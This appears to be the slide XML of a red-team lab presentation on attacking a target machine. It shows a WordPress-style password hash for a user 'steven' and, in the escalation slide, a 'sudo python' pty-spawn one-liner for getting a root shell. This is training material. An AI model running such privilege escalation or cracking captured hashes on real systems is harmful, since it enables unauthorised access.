              <a:t>Red_Team/Target1_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T1_john.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="838224"/>
            <a:ext cx="5157426" cy="1461125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Google Shape;105;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2699550"/>
            <a:ext cx="6202099" cy="2075475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398550" y="2299350"/>
            <a:ext cx="53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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>steven:$P$BK3VD9jsxx/loJOqNsURgHiaB23j7W/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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20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300">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target1_Escalation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>T1_Python.md</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="762775"/>
            <a:ext cx="8520600" cy="35775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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>udo -l</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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>sudo python -c 'import pty;pty.spawn("/bin/bash")'</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l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416350" y="2510975"/>
            <a:ext cx="6902999" cy="619639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="114" name="Google Shape;114;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416350" y="1025600"/>
            <a:ext cx="6902999" cy="1238375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4404000" y="4833175"/>
            <a:ext cx="4714200" cy="603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800">
                <a:solidFill>
                  <a:srgbClr val="6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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